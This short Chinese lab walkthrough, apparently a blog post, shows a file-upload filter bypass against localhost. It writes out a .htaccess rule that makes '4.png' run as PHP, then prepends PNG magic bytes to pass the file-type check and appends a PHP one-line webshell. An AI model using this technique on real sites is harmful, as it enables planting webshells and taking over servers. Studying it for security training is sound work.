一、类型:无法上传php等多种类型,选择.htaccess配置文件
![](https://img-blog.csdnimg.cn/img_convert/8f2a1753ce3ce9acfcda99021d0f5d8e.png)
![](https://img-blog.csdnimg.cn/img_convert/bf77c3c8080f13e42d4f7990a4bb09f9.png)
二、.htaccess内容:(注意:不能命名,就叫.htaccess)
<FilesMatch "4.png">
SetHandler application/x-httpd-php
</FilesMatch>
![](https://img-blog.csdnimg.cn/img_convert/ab0ad28bad3dd5f8790198ae01cb249d.png)
三、修改4.png的内容,在开头加入文件幻数检测绕过的png的value值:89 50 4E 47 0D 0A 1A 0A 00,在后面加入php一句话木马。
![](https://img-blog.csdnimg.cn/img_convert/764a5ea6abed2d86b32aa548d41397a7.png)
四、搜索路径localhost/upload/4.png查看4.png文件,成功
![](https://img-blog.csdnimg.cn/img_convert/880810f25ff5da9286715b3ea6a64563.png)